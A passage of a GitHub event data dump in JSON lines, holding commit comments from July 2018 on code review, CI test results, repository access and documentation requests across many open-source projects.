30216,,,ahk_class #32770 ; Attributes\r\nPostMessage, 0x111, 30217,,,ahk_class #32770 ; Status\r\nPostMessage, 0x111, 30218,,,ahk_class #32770 ; Owner\r\nPostMessage, 0x111, 30219,,,ahk_class #32770 ; Author"}},"created_at":"2018-07-08T15:54:33Z"}
{"id":"7934164652","type":"CommitCommentEvent","actor":{"login":"marctuscher"},"repo":{"name":"devsisters/DQN-tensorflow"},"payload":{"comment":{"id":29634013,"position":5,"line":14,"path":"dqn/environment.py","commit_id":"ba292f0589aa354707332384e4f5483929577293","created_at":"2018-07-08T15:55:35Z","updated_at":"2018-07-08T15:55:35Z","author_association":"NONE","body":"I'm pretty sure this is a minor bug which only affects execution if screen_height != screen_width. Also, scipy.misc.imresize expects the dimensions to be a tuple (height, width)  "}},"created_at":"2018-07-08T15:55:35Z"}
{"id":"7934172541","type":"CommitCommentEvent","actor":{"login":"BehindTheMath"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":29634029,"position":null,"line":null,"path":null,"commit_id":"d488c0b1f51ae52a48e5eb3fd3bed9fa13dc9fea","created_at":"2018-07-08T16:00:57Z","updated_at":"2018-07-08T16:00:57Z","author_association":"CONTRIBUTOR","body":"@robertbaker I can't find any `formatCurrency()` function in the Numeral.js source code, and I'm getting an error when I try using it. Can you point me to the source?"}},"created_at":"2018-07-08T16:00:57Z"}
{"id":"7934177502","type":"CommitCommentEvent","actor":{"login":"JishinJames"},"repo":{"name":"JishinJames/environmental_descriptor"},"payload":{"comment":{"id":29634038,"position":4,"line":5,"path":"README.md","commit_id":"8457b8dbf009fe450b65fb506320ae988936eaca","created_at":"2018-07-08T16:04:23Z","updated_at":"2018-07-08T16:04:23Z","author_association":"OWNER","body":"  In this, we have code to produce captions for the environment in front of visually impaired based on neural networks, along with a server which utilizes this functionality, and clients both commandline and web clients.This can be implemented using webcam or using other external camera device like raspberry pi. "}},"created_at":"2018-07-08T16:04:23Z"}
{"id":"7934179219","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29634041,"position":null,"line":null,"path":null,"commit_id":"07dda535fbba5325b4ddbe577e9fdbc75876a6a7","created_at":"2018-07-08T16:05:41Z","updated_at":"2018-07-08T16:05:41Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T16:05:41Z"}
{"id":"7934179701","type":"CommitCommentEvent","actor":{"login":"stuartcarnie"},"repo":{"name":"libretro/mame"},"payload":{"comment":{"id":29634042,"position":70,"line":905,"path":"scripts/toolchain.lua","commit_id":"bfba9227b2d98ffb87dbd96cf148d85c1ced15a9","created_at":"2018-07-08T16:06:02Z","updated_at":"2018-07-08T16:06:02Z","author_association":"COLLABORATOR","body":"@vadosnaprimer it was in the master source and also commented out, so I have retained it for reference"}},"created_at":"2018-07-08T16:06:02Z"}
{"id":"7934180296","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29634044,"position":null,"line":null,"path":null,"commit_id":"ebf5ad2054aa6a64214b97a4647a21f0cdcceb1b","created_at":"2018-07-08T16:06:28Z","updated_at":"2018-07-08T16:06:28Z","author_association":"MEMBER","body":"Uhm, I see what you are trying to do but that change simply restores the current, wrong behaviour. Shouldn't this be more like: \r\n```\r\nignoreBrowserslistConfig,\r\n+    ignoreBrowserslistConfig = !!process.env.VUE_CLI_MODERN_BUILD || ignoreBrowserslistConfig\r\n```"}},"created_at":"2018-07-08T16:06:28Z"}
{"id":"7934180303","type":"CommitCommentEvent","actor":{"login":"JishinJames"},"repo":{"name":"JishinJames/environmental_descriptor"},"payload":{"comment":{"id":29634045,"position":4,"line":11,"path":"README.md","commit_id":"c237d18d66e417aac8c5f0980ff9bdee32eeb585","created_at":"2018-07-08T16:06:28Z","updated_at":"2018-07-08T16:06:28Z","author_association":"OWNER","body":"visit environmental_descriptor/reaspberrypi/readme.txt\r\n\r\nvisit environmental_descriptor/webcam/readme.txt"}},"created_at":"2018-07-08T16:06:28Z"}
{"id":"7934182112","type":"CommitCommentEvent","actor":{"login":"Plabon21"},"repo":{"name":"waegaein/FacebookHackerCup2018"},"payload":{"comment":{"id":29634056,"position":null,"line":null,"path":null,"commit_id":"cf18a92432e6867ec66fb8d9d1c4762133988dac","created_at":"2018-07-08T16:07:42Z","updated_at":"2018-07-08T16:07:42Z","author_association":"NONE","body":"where is the code?"}},"created_at":"2018-07-08T16:07:42Z"}
{"id":"7934184175","type":"CommitCommentEvent","actor":{"login":"Akryum"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29634059,"position":null,"line":null,"path":null,"commit_id":"ebf5ad2054aa6a64214b97a4647a21f0cdcceb1b","created_at":"2018-07-08T16:09:12Z","updated_at":"2018-07-08T16:09:12Z","author_association":"MEMBER","body":"No, it's the default value. It will be overridden only if `ignoreBrowserslistConfig` is defined in `options`."}},"created_at":"2018-07-08T16:09:12Z"}
{"id":"7934184263","type":"CommitCommentEvent","actor":{"login":"cyb3rist"},"repo":{"name":"cyb3rist/Updatix"},"payload":{"comment":{"id":29634062,"position":null,"line":null,"path":null,"commit_id":"02b817b30a3e35e990478aa61bd69a1cd4892d06","created_at":"2018-07-08T16:09:16Z","updated_at":"2018-07-08T16:09:16Z","author_association":"OWNER","body":"siliguricircle.com\r\nwebbengal.in\r\nstartupsiliguri.com"}},"created_at":"2018-07-08T16:09:16Z"}
{"id":"7934184601","type":"CommitCommentEvent","actor":{"login":"waegaein"},"repo":{"name":"waegaein/FacebookHackerCup2018"},"payload":{"comment":{"id":29634064,"position":null,"line":null,"path":null,"commit_id":"cf18a92432e6867ec66fb8d9d1c4762133988dac","created_at":"2018-07-08T16:09:30Z","updated_at":"2018-07-08T16:09:30Z","author_association":"OWNER","body":"Hi,\njust started working on it.\nHave not implemented logic yet\n\n2018년 7월 9일 (월) 오전 1:07, Plabon21 <notifications@github.com>님이 작성:\n\n> where is the code?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/waegaein/FacebookHackerCup2018/commit/cf18a92432e6867ec66fb8d9d1c4762133988dac#commitcomment-29634056>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFiRkRvwWoZmXMIVYuQ6Uw8qFb6OEY3Uks5uEi5OgaJpZM4VGxyu>\n> .\n>\n"}},"created_at":"2018-07-08T16:09:30Z"}
{"id":"7934184864","type":"CommitCommentEvent","actor":{"login":"RAAKASH"},"repo":{"name":"RAAKASH/DeepLearningFramework"},"payload":{"comment":{"id":29634066,"position":null,"line":null,"path":null,"commit_id":"79d5047a1bb59dcc064ed5b832267b40be8df2e6","created_at":"2018-07-08T16:09:41Z","updated_at":"2018-07-08T16:09:41Z","author_association":"OWNER","body":"added index for the loss value because of keepdims."}},"created_at":"2018-07-08T16:09:41Z"}
{"id":"7934186389","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29634071,"position":null,"line":null,"path":null,"commit_id":"eccf1d3d8d0c506611a1445425acbfb6f7638cbb","created_at":"2018-07-08T16:10:39Z","updated_at":"2018-07-08T16:10:39Z","author_association":"NONE","body":"Maybe an increased hash would  make sense for this experiment ?\r\n"}},"created_at":"2018-07-08T16:10:39Z"}
{"id":"7934186672","type":"CommitCommentEvent","actor":{"login":"Plabon21"},"repo":{"name":"waegaein/FacebookHackerCup2018"},"payload":{"comment":{"id":29634073,"position":null,"line":null,"path":null,"commit_id":"cf18a92432e6867ec66fb8d9d1c4762133988dac","created_at":"2018-07-08T16:10:49Z","updated_at":"2018-07-08T16:10:49Z","author_association":"NONE","body":"ohh.thanks for reply.\r\n"}},"created_at":"2018-07-08T16:10:49Z"}
{"id":"7934187321","type":"CommitCommentEvent","actor":{"login":"flexdinesh"},"repo":{"name":"flexdinesh/react-redux-boilerplate"},"payload":{"comment":{"id":29634076,"position":41,"line":39,"path":"app/containers/HomePage/index.js","commit_id":"04829f8dd5deffb695aef966585a39f7ed68692e","created_at":"2018-07-08T16:11:19Z","updated_at":"2018-07-08T16:11:19Z","author_association":"OWNER","body":"@ejabu It's completely okay to not export `mapDispatchToProps `. The reason we're exporting it is because only then we'll be able to test the method in [our test file here](https://github.com/flexdinesh/react-redux-boilerplate/blob/5ec626d9ae6b9541fe94afa393e20942062a28ef/app/containers/HomePage/tests/index.test.js#L54)."}},"created_at":"2018-07-08T16:11:19Z"}
{"id":"7934187599","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29634078,"position":null,"line":null,"path":null,"commit_id":"c0a8c5b207c7cd91e59da7e8af28dafb9fe33ff8","created_at":"2018-07-08T16:11:30Z","updated_at":"2018-07-08T16:11:30Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-08T16:11:30Z"}
{"id":"7934188030","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29634081,"position":null,"line":null,"path":null,"commit_id":"d5f042dc8afce435ef1419684421823a45c9c3b2","created_at":"2018-07-08T16:11:48Z","updated_at":"2018-07-08T16:11:48Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-08T16:11:48Z"}
{"id":"7934192240","type":"CommitCommentEvent","actor":{"login":"NicknineTheEagle"},"repo":{"name":"kode54/vgmstream"},"payload":{"comment":{"id":29634086,"position":null,"line":null,"path":null,"commit_id":"44dc7ce7ea4c91937270be26b668f52acad46478","created_at":"2018-07-08T16:14:47Z","updated_at":"2018-07-08T16:14:47Z","author_association":"NONE","body":"SSX 3 was not released on PC, the samples I sent are from PS2 version."}},"created_at":"2018-07-08T16:14:47Z"}
{"id":"7934195828","type":"CommitCommentEvent","actor":{"login":"joealden"},"repo":{"name":"reasonml/reason-react"},"payload":{"comment":{"id":29634097,"position":null,"line":null,"path":null,"commit_id":"b9ca9f3b85e479d8e4a4de667cc69652eac9bf4c","created_at":"2018-07-08T16:17:19Z","updated_at":"2018-07-08T16:17:19Z","author_association":"NONE","body":"I don't think this was the right correction. I think the intention was that the last sentence was referring to the word or phrase 'state machine'. So it was saying if you don't know what the word 'reducer' or the phrase 'state machine' means, then don't worry about it."}},"created_at":"2018-07-08T16:17:19Z"}
{"id":"7934196087","type":"CommitCommentEvent","actor":{"login":"5HT"},"repo":{"name":"nau/dependentc"},"payload":{"comment":{"id":29634098,"position":123,"line":123,"path":"src/Main.hs","commit_id":"e1e0bbc455aad791bff3dcbc02ef8fb694443d62","created_at":"2018-07-08T16:17:31Z","updated_at":"2018-07-08T16:17:31Z","author_association":"NONE","body":":-)"}},"created_at":"2018-07-08T16:17:31Z"}
{"id":"7934198148","type":"CommitCommentEvent","actor":{"login":"kapppi"},"repo":{"name":"xabier1989/WiredPlayers-RP"},"payload":{"comment":{"id":29634105,"position":null,"line":null,"path":null,"commit_id":"1e7ccdf716acad32f810d12d6f7fc1f93217863b","created_at":"2018-07-08T16:19:00Z","updated_at":"2018-07-08T16:19:00Z","author_association":"NONE","body":"You are really professional! Rank ist now reserved keyword, you was right. Thanks alot and keep up the good work!"}},"created_at":"2018-07-08T16:19:00Z"}
{"id":"7934201495","type":"CommitCommentEvent","actor":{"login":"tomoose11"},"repo":{"name":"tomoose11/HerExp"},"payload":{"comment":{"id":29634111,"position":null,"line":null,"path":null,"commit_id":"8d985b9912db0574fb7d0497929b1d7f3c2d8220","created_at":"2018-07-08T16:21:22Z","updated_at":"2018-07-08T16:21:22Z","author_association":"OWNER","body":"cxc"}},"created_at":"2018-07-08T16:21:22Z"}
{"id":"7934212581","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi3"},"payload":{"comment":{"id":29634138,"position":null,"line":null,"path":null,"commit_id":"87ebd902614019bb3dd46c8313f44c1887150e17","created_at":"2018-07-08T16:29:22Z","updated_at":"2018-07-08T16:29:22Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi3/09c9832d-6870-47a8-929e-ccc8efdd8f6d\n"}},"created_at":"2018-07-08T16:29:22Z"}
{"id":"7934216623","type":"CommitCommentEvent","actor":{"login":"ashtonkbailey"},"repo":{"name":"benjaminhayek/Linked-List"},"payload":{"comment":{"id":29634143,"position":null,"line":null,"path":null,"commit_id":"5de2512633ce35a0920225c1b257a5e2bd2a2881","created_at":"2018-07-08T16:32:01Z","updated_at":"2018-07-08T16:32:01Z","author_association":"COLLABORATOR","body":"nice"}},"created_at":"2018-07-08T16:32:01Z"}
{"id":"7934218169","type":"CommitCommentEvent","actor":{"login":"samhstn"},"repo":{"name":"samhstn/My-Config"},"payload":{"comment":{"id":29634145,"position":278,"line":171,"path":"README.md","commit_id":"fa94daa02216dbd83f3dcfb6c8ca447ff46a97be","created_at":"2018-07-08T16:33:02Z","updated_at":"2018-07-08T16:33:02Z","author_association":"OWNER","body":"Can't remember, I'll add it back in"}},"created_at":"2018-07-08T16:33:02Z"}
{"id":"7934218640","type":"CommitCommentEvent","actor":{"login":"orubin"},"repo":{"name":"orubin/backstage_server"},"payload":{"comment":{"id":29634147,"position":null,"line":null,"path":null,"commit_id":"07d8697e46acf026c2aa098bea21ad5cc31432ea","created_at":"2018-07-08T16:33:22Z","updated_at":"2018-07-08T16:33:22Z","author_association":"OWNER","body":"@adeliyianni3  - LoadCreatorsWithCategories now works. \r\nAlso - check the ajax call in views/layouts/explore.hbs that calls this endpoint end gets the result in json format."}},"created_at":"2018-07-08T16:33:22Z"}
{"id":"7934222149","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29634149,"position":null,"line":null,"path":null,"commit_id":"ebf5ad2054aa6a64214b97a4647a21f0cdcceb1b","created_at":"2018-07-08T16:35:56Z","updated_at":"2018-07-08T16:35:56Z","author_association":"MEMBER","body":"Oh right, got it. That works. "}},"created_at":"2018-07-08T16:35:56Z"}
{"id":"7934222246","type":"CommitCommentEvent","actor":{"login":"santnema"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29634150,"position":null,"line":null,"path":null,"commit_id":"4704e29009cb6e48db500cfb4f85f5a3a4d21925","created_at":"2018-07-08T16:36:01Z","updated_at":"2018-07-08T16:36:01Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make basic sprites](https://trello.com/c/KaSEUvlw/1-make-basic-sprites)"}},"created_at":"2018-07-08T16:36:01Z"}
{"id":"7934223542","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29634152,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T16:36:53Z","updated_at":"2018-07-08T16:36:53Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T16:36:53Z"}
{"id":"7934228242","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29634159,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-08T16:40:16Z","updated_at":"2018-07-08T16:40:16Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T16:40:16Z"}
{"id":"7934228539","type":"CommitCommentEvent","actor":{"login":"danlyke"},"repo":{"name":"mpogue2/SquareDesk"},"payload":{"comment":{"id":29634160,"position":null,"line":null,"path":null,"commit_id":"59c3fdf54eab989dd31f882adf7a8e54c010d5ef","created_at":"2018-07-08T16:40:28Z","updated_at":"2018-07-08T16:40:28Z","author_association":"COLLABORATOR","body":"I believe you can just return the result of QString::compare..."}},"created_at":"2018-07-08T16:40:28Z"}
{"id":"7934230490","type":"CommitCommentEvent","actor":{"login":"Dorson"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29634163,"position":null,"line":null,"path":null,"commit_id":"97a55878e61fd19b8e9eb68759a8dc902a1831a6","created_at":"2018-07-08T16:42:00Z","updated_at":"2018-07-08T16:42:00Z","author_association":"NONE","body":"I am very happy about bech32.\r\n\r\nAs of now, I see a bit of confusion among the developers who coded for bech32 in a fast time. There is some confusion for how to generate the bech32 valid wallets. \r\n\r\nI think there is a great potential for clarification AND examples for how to generate valid keys + addresses from start to finish. Like a step by step documentation. I know it already exists, but I see that some people got it wrong anyway.\r\n\r\nLet's take a 12 word seed. Try to generate bech32 wallets with:\r\n\r\nhttps://coinb.in/#newSegWit\r\n\r\nAND \r\n\r\nhttps://iancoleman.io/bip39/\r\n\r\nAND \r\nIn the electrum wallet.\r\n\r\nAll of them generate a different thing for bech32. All of the coders are smart. Why do they get different results ?\r\n\r\nI have no idea why. I only see that there is a great potential for clarification. What is exactly missing in the documentation is unclear. \r\n\r\nThe best thing would be to set up a very easy step-by-step guide for bech32 address + key generation and best practices guide. So that developers can follow the same thing.\r\n\r\nAlso the Q&A sessions with smart and silly questions about Bech32 generation would help to understand what the developers misunderstand about the Bech32. So that clarifications can be added to the documentation.\r\n\r\nThx for the bech32. Let's keep building a better world !\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-08T16:42:00Z"}
{"id":"7934230881","type":"CommitCommentEvent","actor":{"login":"bloerwald"},"repo":{"name":"WoW-Tools/CASCExplorer"},"payload":{"comment":{"id":29634164,"position":56,"line":268,"path":"CascLib/CASCConfig.cs","commit_id":"2dff0712e76eba4dacec4e76613c6bb5d282c7fe","created_at":"2018-07-08T16:42:17Z","updated_at":"2018-07-08T16:42:17Z","author_association":"NONE","body":"This can return `null` for `Unknown` game type (which is private, so can't be overwritten). It should probably throw or even throw in `Detect*Game()`. Else, it throws in `Path.Combine()` below."}},"created_at":"2018-07-08T16:42:17Z"}
{"id":"7934231044","type":"CommitCommentEvent","actor":{"login":"DarthMarino"},"repo":{"name":"DarthMarino/PassWordGen"},"payload":{"comment":{"id":29634165,"position":null,"line":null,"path":null,"commit_id":"004d5d71e27040f645bab047ce1f9af180dc1624","created_at":"2018-07-08T16:42:24Z","updated_at":"2018-07-08T16:42:24Z","author_association":"OWNER","body":"Buen trabajo"}},"created_at":"2018-07-08T16:42:24Z"}
{"id":"7934231144","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29634166,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-08T16:42:29Z","updated_at":"2018-07-08T16:42:29Z","author_association":"OWNER","body":"@albfan I'll go ahead and give you push access to this repository, I'm not going to have time to work on this for a while."}},"created_at":"2018-07-08T16:42:29Z"}
{"id":"7934234487","type":"CommitCommentEvent","actor":{"login":"rcaridade145"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29634171,"position":null,"line":null,"path":null,"commit_id":"14c0140201ba9142ac96d30857bee1fcbb0d7da3","created_at":"2018-07-08T16:44:55Z","updated_at":"2018-07-08T16:44:55Z","author_association":"NONE","body":"Wonder if this fixes issue #34 also"}},"created_at":"2018-07-08T16:44:55Z"}
{"id":"7934237920","type":"CommitCommentEvent","actor":{"login":"SnO2WMaN"},"repo":{"name":"soichiro-nitta/nitta.studio"},"payload":{"comment":{"id":29634177,"position":null,"line":null,"path":null,"commit_id":"1a70f7b1df678491d9edcf8f2dd1c82919765b7d","created_at":"2018-07-08T16:47:20Z","updated_at":"2018-07-08T16:47:20Z","author_association":"NONE","body":"👎 "}},"created_at":"2018-07-08T16:47:20Z"}
{"id":"7934239377","type":"CommitCommentEvent","actor":{"login":"KHobden"},"repo":{"name":"KHobden/2048"},"payload":{"comment":{"id":29634178,"position":null,"line":null,"path":null,"commit_id":"87aa6f8e8a41d169bc99bc5e773e62a4afd32cc2","created_at":"2018-07-08T16:48:25Z","updated_at":"2018-07-08T16:48:25Z","author_association":"OWNER","body":"Personal changes added"}},"created_at":"2018-07-08T16:48:25Z"}
{"id":"7934241056","type":"CommitCommentEvent","actor":{"login":"soichiro-nitta"},"repo":{"name":"soichiro-nitta/nitta.studio"},"payload":{"comment":{"id":29634181,"position":null,"line":null,"path":null,"commit_id":"1a70f7b1df678491d9edcf8f2dd1c82919765b7d","created_at":"2018-07-08T16:49:42Z","updated_at":"2018-07-08T16:49:42Z","author_association":"OWNER","body":"@SnO2WMaN YEAHHH!!!!!"}},"created_at":"2018-07-08T16:49:42Z"}
{"id":"7934241524","type":"CommitCommentEvent","actor":{"login":"hqucms"},"repo":{"name":"hqucms/cmssw"},"payload":{"comment":{"id":29634182,"position":null,"line":null,"path":null,"commit_id":"c04145d1bd9b1671db4d39925fe9a6421d770434","created_at":"2018-07-08T16:50:06Z","updated_at":"2018-07-08T16:50:06Z","author_association":"OWNER","body":"This is needed to run DeepBoostedJet in RECO->MiniAOD process for a very specific reason: in JetSubstructurePacker, when linking the daughters, `daughterPtrVector()` is called [here](https://github.com/cms-sw/cmssw/blob/master/PhysicsTools/PatUtils/plugins/JetSubstructurePacker.cc#L87) which invokes `cacheDaughters()` (because `subjetCollections_` has already been filled then), but at that stage, the daughters are `reco::PFCandidate`, so what has been cached are also `reco::PFCandidate`. After fixing the daughters to `pat::PackedCandidate` and putting the jet collection to the event, the cache stays, so in subsequent access of the daughters `reco::PFCandidate` is still returned (from the cache) instead of  `pat::PackedCandidate`."}},"created_at":"2018-07-08T16:50:06Z"}
{"id":"7934241868","type":"CommitCommentEvent","actor":{"login":"SeoYoungSun"},"repo":{"name":"SeoYoungSun/NewSky"},"payload":{"comment":{"id":29634183,"position":null,"line":null,"path":null,"commit_id":"597acdba5096cc633d204fe785a0dd4bfd2803d4","created_at":"2018-07-08T16:50:20Z","updated_at":"2018-07-08T16:50:20Z","author_association":"OWNER","body":"ㅇ"}},"created_at":"2018-07-08T16:50:20Z"}
{"id":"7934242864","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/jsonpickle-feedstock"},"payload":{"comment":{"id":29634185,"position":null,"line":null,"path":null,"commit_id":"7d3c07114f9a7d34d064a316f7e713cfd98789f0","created_at":"2018-07-08T16:51:07Z","updated_at":"2018-07-08T16:51:07Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @robmcmullen were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @robmcmullen were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-08T16:51:07Z"}
{"id":"7934243792","type":"CommitCommentEvent","actor":{"login":"Dorson"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29634186,"position":null,"line":null,"path":null,"commit_id":"6c708338c21a5ce1b0dc7bf4d2c8a38a1e853bfb","created_at":"2018-07-08T16:51:32Z","updated_at":"2018-07-08T16:51:32Z","author_association":"NONE","body":"About the current state of bech32 coder-adoption from my perspective.\r\n\r\nI made the same comment in here, and noticed the newer version later. The comment is valid for both:\r\nhttps://github.com/bitcoin/bips/commit/97a55878e61fd19b8e9eb68759a8dc902a1831a6\r\nI make a double copy on both, because I am human and we make mistakes :-)\r\n\r\n-------- Copy from the other post ----------\r\n\r\nI am very happy about bech32.\r\n\r\nAs of now, I see a bit of confusion among the developers who coded for bech32 in a fast time. There is some confusion for how to generate the bech32 valid wallets. \r\n\r\nI think there is a great potential for clarification AND examples for how to generate valid keys + addresses from start to finish. Like a step by step documentation. I know it already exists, but I see that some people got it wrong anyway.\r\n\r\nLet's take a 12 word seed. Try to generate bech32 wallets with:\r\n\r\nhttps://coinb.in/#newSegWit\r\n\r\nAND \r\n\r\nhttps://iancoleman.io/bip39/\r\n\r\nAND \r\nIn the electrum wallet.\r\n\r\nAll of them generate a different thing for bech32. All of the coders are smart. Why do they get different results ?\r\n\r\nI have no idea why. I only see that there is a great potential for clarification. What is exactly missing in the documentation is unclear. \r\n\r\nThe best thing would be to set up a very easy step-by-step guide for bech32 address + key generation and best practices guide. So that developers can follow the same thing.\r\n\r\nAlso the Q&A sessions with smart and silly questions about Bech32 generation would help to understand what the developers misunderstand about the Bech32. So that clarifications can be added to the documentation.\r\n\r\nThx for the bech32. **Let's keep building a better world !**\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-08T16:51:32Z"}
{"id":"7934248041","type":"CommitCommentEvent","actor":{"login":"ggreif"},"repo":{"name":"turion/rhine"},"payload":{"comment":{"id":29634189,"position":null,"line":null,"path":null,"commit_id":"47770f8879c49c45b711b2fa3a0a46ff50d203a2","created_at":"2018-07-08T16:54:21Z","updated_at":"2018-07-08T16:54:21Z","author_association":"CONTRIBUTOR","body":"This way seems to get the timestamp of when reading started, not when the data became available. Compare to event clock, where it is done the other way round."}},"created_at":"2018-07-08T16:54:21Z"}
{"id":"7934251130","type":"CommitCommentEvent","actor":{"login":"BlockCat"},"repo":{"name":"Arkarstronk/TurnBasedFeest"},"payload":{"comment":{"id":29634191,"position":64,"line":64,"path":"BattleSystem/Battle.cs","commit_id":"401ebfa8362bcec71aaa5ba29e9df5f13b1b13be","created_at":"2018-07-08T16:56:48Z","updated_at":"2018-07-08T16:56:48Z","author_association":"COLLABORATOR","body":"I'm not a fan of this Boolean as a who wins and did battle end. Can't this be more descriptive with an enum?"}},"created_at":"2018-07-08T16:56:48Z"}
{"id":"7934255396","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634199,"position":18,"line":72,"path":"Makefile","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:00:09Z","updated_at":"2018-07-08T17:00:09Z","author_association":"OWNER","body":"`runtime/errors.log`  `runtime/*.log`\r\nthis may be redundant"}},"created_at":"2018-07-08T17:00:09Z"}
{"id":"7934256587","type":"CommitCommentEvent","actor":{"login":"BlockCat"},"repo":{"name":"Arkarstronk/TurnBasedFeest"},"payload":{"comment":{"id":29634205,"position":31,"line":45,"path":"Game1.cs","commit_id":"401ebfa8362bcec71aaa5ba29e9df5f13b1b13be","created_at":"2018-07-08T17:00:45Z","updated_at":"2018-07-08T17:00:45Z","author_association":"COLLABORATOR","body":"The constructor is getting really long. And i think the actors should not have a graphics device instance but a texture or sprue instead. \r\nHow about creating actors via a actor builder (factory)"}},"created_at":"2018-07-08T17:00:45Z"}
{"id":"7934256990","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634206,"position":5,"line":18,"path":"images/init/2to3.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:01:00Z","updated_at":"2018-07-08T17:01:00Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:01:00Z"}
{"id":"7934257150","type":"CommitCommentEvent","actor":{"login":"FALCONgod"},"repo":{"name":"arcanecfg/Instagram-Private-Scraper"},"payload":{"comment":{"id":29634207,"position":null,"line":null,"path":null,"commit_id":"bf1d7e3e79458de01901ab6d9c2f562b42717ad9","created_at":"2018-07-08T17:01:06Z","updated_at":"2018-07-08T17:01:06Z","author_association":"NONE","body":"yo bro  nice work  can u tell how to open it on the laptop arcanecfg  please  as i cant get it to open bro\r\ncan u add me here to have a chat sometime MasterBot#2898  on discord "}},"created_at":"2018-07-08T17:01:06Z"}
